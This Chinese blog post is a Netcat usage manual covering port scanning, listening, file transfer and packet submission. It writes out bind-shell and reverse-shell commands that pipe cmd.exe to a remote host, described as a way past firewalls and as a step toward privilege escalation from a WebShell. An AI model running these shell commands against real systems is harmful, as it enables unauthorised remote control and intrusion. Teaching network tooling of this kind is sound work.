Netcat使用手册

最新推荐文章于 2024-06-08 23:19:53 发布
最新推荐文章于 2024-06-08 23:19:53 发布
阅读量1k 收藏
点赞数
分类专栏: T00ls 文章标签: nc Netcat 瑞士军刀

在网络工具中有“瑞士军刀”美誉的NetCat,在我们用了N年了至今仍是爱不释手。因为它短小精悍。

连接到某处:

nc [-options] hostname port[s] [ports] …

监听端口等待连接:

nc -l -p port [-options] [hostname] [port]

主要参数:

主要用途

一般我们使用netcat做的最多的事情为以下三种:

1、 扫描指定IP端口情况

2、 端口转发数据(重点)

3、提交自定义数据包

以下IP 处可以使用域名,nc会调用NDS解析成IP地址。

【命令】nc -v ip port

nc -v 96.44.174.9 80

扫瞄某 IP 的某个端口,返回端口信息详细输出。

nc -v -z ip port-port

nc -v -z 96.44.174.9 80-1024

扫描某IP的端口段,返回端口信息详细输出,但扫描速度很慢。

nc -v -z -u ip port-port

nc -v -z -u 96.44.174.9 25-1024

扫描某 IP 的某 UDP 端口段,返回端口信息详细输出,但扫描速度很慢。

nc -nvv -w2 -z ip port-port

nc -nvv -w2 -z 96.44.174.9 80-1024

扫锚某IP的端口段,连接超时时间为2秒。

实例:

总结:使用nc扫描速度真的不敢恭维,而且对于扫描主机存活、端口等还是交给更专业的nmap来进行,物尽其用才是硬道理,这里全当科普。

2、监听端口、连接端口、转发端口常用命令。

【命令】nc -l -p 520

开启本机的 TCP 520 端口并监听次端口的上传输的数据。

【命令】nc -l -v -p 520

开启本机的 TCP 520 端口并将监听到的信息输出到当前 CMD 窗口。这个命令也是端口转发shell的基础。

nc -l -p 520 > C:/log.dat

开启本机的 TCP 520 端口并将监听到的信息输出到 C:/log.dat 下的日志文件里。

nc -nvv 192.168.1.101 520

连接到192.168.1.101主机的 520。

nc -l -p 2012 -t -e C:WINDOWSsystem32cmd.exe

nc -nvv 192.168.1.101 2012

采用正向连接方式,远程主机 上运行 nc -l -p 2012 -t -e cmd.exe 意为绑定远程主机的 CMD 到2012 端口,当本地主机连接远程主机成功时就会返回给本地主机一个CMD Shell ;在本地主机上运行 nc -nvv 192.168.1.101 2012 用于连接已经将 CMD 重定向到 2012 端口的远程主机 。

nc -l –vv -p 2012

nc -t -e C:WINDOWSsystem32cmd.exe 192.168.1.102 2012

采用反向连接方式,先在本地主机运行 nc -l –vv -p 2012 开启2012 端口并监听等待远程主机连接;在远程主机上运行 nc -t -e cmd.exe 192.168.1.102 2012 将远程主机的 CMD 重定向到 IP 地址为 192.168.1.102 端口号为2012 的主机上,连接成功后 IP 地址为 192.168.1.102 的主机会得到一个CMD Shell。

总结:这个情况是最常用的内网端口转发功能,这样反弹shell即可执行命令。反向连接就是常用的反弹shell到本地,因为由主机主动发送的情况本地防火墙等设备一般不会去拦截,而正向连接到远程主机的某端口常常被拦截。

实例:

nc -vv www.91ri.org port < C:/http.txt

nc -vv www.91ri.org 80 < C:/http.txt

提交http.txt内数据包到www.91ri.org的80端口,-vv参数会使速度变慢,但可以跟踪过程。例如IISput漏洞就可以自定义数据包使用此方法提交。

nc -v -n ip port < C:/sunzn.exe

nc -v -l -p port > D:/sunzn.exe

在本地运行 nc -v -n ip port < C:/sunzn.exe 意为从本地 C 盘根目录中读取 sunzn.exe 文件的内容,并把这些数据发送到远程主机的对应端口上 ,在远程主机运行 nc -v -l -p port > D:/sunzn.exe 意为监听对应端口并把接收到的信息数据写到 D:/sunzn.exe 中,两行命令实现了文件在本地主机和远程主机间的传输。

传输http数据包实例:

好东西肯定需要在不同的环境中都能使用,在linux环境中同样有着netcat可以使用。主要过程如下。

Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法利用。因此必须要反弹一个Shell命令行窗口,在命令行终端下执行溢出进行提权。

主要步骤:

1、wget一个tar压缩的nc

2、解压文件

3、解压完毕之后会生成目录

4、配置环境

5、配置完了之后就可以编译了。

6、编译成功就生成了netcat可执行的文件了,位于src目录,cd进去进行运行./netcat文件就是我们的nc了。

远程Linux转发命令

日币奖励:

本文为原创科普型文章,首发91ri.org,作者详细的将netcat的常见命令列出并配以实例,适合新手阅读,根据本站积分规则给予日币奖励共6枚。

7禧
关注
专栏目录
netcat工具简单使用
W2398439780的博客
11-07 566
(2)在 job 文件夹下创建 Flume Agent 配置文件 flume-netcat-logger.conf。创建 Flume Agent 配置文件 flume-netcat-logger.conf。(3)在 flume-netcat-logger.conf 文件中添加如下内容。(1)在 flume 目录下创建 job 文件夹并进入 job 文件夹。在 /opt/software目录下安装netcat。判断 44444 端口是否被占用。nc -lk 加上端口号。然后就可以互相收发消息了。
Flume 学习笔记(一)使用Flume收集netcat端口通信的信息到本地文件
希望每天都能进步一点点
03-19 1477
若发现文章有误,敬请指教,感谢 文章目录运行环境一、准备 netcat 工具二、认识 Flume2.1 Flume 概念2.1 Flume 架构三、使用 Flume 收集端口的信息3.1 开启netcat3.2 创建配置文件3.3 启动flume 运行环境 Vmware 15 Flume1.9 CentOS7 操作系统 一、准备 netcat 工具 参考资料 Netcat 是一款简单的Unix工具,使用UDP和TCP协议。 它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的.
nc官方帮助文档_netcat_eng
07-21
一直听说一个叫NC的工具很厉害,今天决定看看传说中如此神秘的NC到底是什么。 NC居然只有几十K大小,打开以后就一个CMD窗口,就行字:"输入命令行:"于是又在网上搜索关于NC的使用教程。翻了半天各个网站上几乎是同一片文章,而且我照着上面的教程打也不好用。于是我找到了官方的文档—NetCat Tutorial 。Netcat是一个可以通过TCP和UDP网络连接对数据进行读和写的实用工具。如果你有责任对网络和系统安全负责,了解NetCat的能力是非常必要的。Netcat 可以用作端口扫描,后门,端口重定向,端口监听和许多其他非常酷的功能。它并不总是工作的最佳工具,但是如果我没有任何其他工具的时候,我会选择 Netcat.在此教程中我会展示一个完整的破解,只用Netcat仅仅是为了指出它是多么万能。
NetCat使用手册
08-21 192
  简介: 在网络工具中有“瑞士军刀”美誉的NetCat(以下简称nc),在我们用了N年了至今仍是爱不释手。因为它短小精悍(这个用在它身上很适合,现在有人已经将其修改成大约10K左右,而且功能不减少)。 参数格式 连接到某处: nc [-options] hostname port[s] [ports] … 监听端口等待连接: nc -l -p port [-op...
netcat手册
08-16 88
Introduzione Per chiunque si sia addentrato nel mondo del networking, è impossibile non essersi imbattuto in netcat. Questo piccolo progr
netcat详解
12-16
nc这里指NetCat,它在网络工具中有“瑞士军刀”美誉,而文档讲的就是这个的一些介绍和使用
NetCat
tansuoliming的博客
05-05 210
简介:网络瑞士军刀NetCat,黑客常用来抓在网络工具中有“瑞士军刀”美誉的NetCat,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其...
Linux命令大全使用手册
06-05
本手册《Linux命令大全使用手册》将详细介绍各种常用且重要的Linux命令,帮助用户深入理解和熟练掌握Linux系统操作。 一、文件与目录操作 1. `ls`:列出目录内容,如`ls -l`显示详细信息,`ls -a`显示所有文件括...
Kali使用手册.docx
12-09
1.3.3 系统挂载/磁盘使用 14 1.3.4 谁打开了哪个文件? 14 1.3.5 挂载/卸载文件系统 15 1.4 网络 15 1.4.1 网络调试 15 1.4.2 路由 15 1.4.3 配置IP地址 16 1.4.4 变更MAC地址 16 1.4.5 端口 16 1.4.6 ...
UNIX操作系统基础使用手册.rar_UNIX_操作系统
09-20
本手册将深入探讨UNIX的基础使用,帮助初学者掌握这个强大系统的精髓。 一、UNIX概述 UNIX最初由肯·汤普逊和丹尼斯·里奇在AT&T贝尔实验室开发,其设计哲学强调简洁性和模块化。现在,我们所说的UNIX通常指的是...
netcat教程
12-25
强大的netcat工具的各种使用方法,英文原版高清pdf文件
Wireshark、Netcat
weixin_30315905的博客
03-18 137
Wireshark Wireshark是一个网络数据分析软件,功能是截取网络数据,并尽可能显示出最为详细的网络数据数据。为了安全考虑,wireshark只能查看封,而不能修改封的内容,或者发送封。 界面 抓获取 点击捕获->设置,设置混杂模式,选中需要监听的接口,点击“开始”,开始捕获数据: 过滤 捕捉过滤器是数据经过的第一层过滤器,它用于控制捕捉数据的数量,...
Linux网络命令:网络工具netcat详解
最新发布
weixin_70208651的博客
06-08 2542
Netcat(也称为ncnetcat-openbsd)是一个非常强大和灵活的网络工具,它主要用于创建TCP或UDP网络连接。Netcat可以作为一个简单的终端程序,也可以作为一个强大的网络诊断、监控和攻击工具。在我们测试工作中可以经常用到这个工具。可以通过EPEL仓库来安装和卸载,可以通过yum和DNF来安装;通过nc可以连接到网络主机的特定端口、监听端口、传输文件等,可以用于各种网络活动,括渗透测试。也可以用于各种网络任务,从诊断到安全测试。
NetCat 工具
weixin_34007879的博客
03-02 264
在网络工具中有“瑞士×××”美誉的NetCat, 在我们用了N年了至今仍是爱不释手。因为它短小精悍(这个用在它身上很适合,现在有人已经将其修改成大约10K左右,而且功能不减少)。现在就我的一些使用心得和一些帮助文档中,做一些介绍与大家共勉。 1、 了解NC的用法 命令:nc –h 技巧:win98用户可以在autoexec.bat加入path=nc的路径,...
2.常见工具——NETCAT
Daylight
07-27 916
NETCAT——NC nc的可以做到的事情 网络工具中的瑞士军刀——小身材,大智慧 侦听模式 telnet/获取banner信息 传输文本信息 传输文件/目录 加密传输文件 远程控制/木马 加密所有流量 流媒体服务器 远程克隆硬盘 Banner Banner信息,欢迎语,在banner信息中可以得到软件开发商,软件名称、版本、服务类型等信息,通过这些信息可以使用某些工具直接去使用相对应的exp去攻击。 前提条件:需要和目标建立链接,只有建立了链接,我们才能获取对应的banner信息 目标服务器上可以对b
netcat小试
慢慢变小佬的博客
12-19 445
内容 (1)Netcat建立通信通道、监控和文件传输 (2)Cryptcat建立加密通信隧道 (3)*Rootkit文件隐藏及检测 (加分实验) 原理 netcat: netCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end) 工具,能被其它的程序或脚本直接地或容易地驱动。同时,它又是一个功能丰富...
Netcat命令介绍及实践
Whenbeen的博客
05-06 522
1.Windows系统nc工具使用方法 [v1.10 NT] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [options] [hostname] [port] options: -d de...
【SIP协议远程分析利器,WireShark+NetCat+TcpDump助力实现Freeswitch远程调试】
weixin_40991654的博客
09-07 3609
SIP协议分析图形化使用技巧,服务器实时抓+图形化分析经验分享,比传统抓存文件、下载分析模式要高效。
NetCat(NC)详细教程
qq_41245301的博客
11-29 696
1995年第一个版本公布,NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end)工具,能被其它的程序程序或脚本直接地或容易地驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能。NetCat,它的实际可运行的名字叫nc,应该早很就被提供,就象另一个没有公开但是标准的Unix工具。
NetCat中文手册:全能网络管理工具详解
在使用UDP协议时,NetCat表现出类似telnet的特性,但能处理不可靠的数据传输,适合那些对数据完整性和延迟敏感的应用场景。与telnet相比,NetCat没有标准输入文件结束符的问题,可以无缝传输任意二进制数据,不会...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值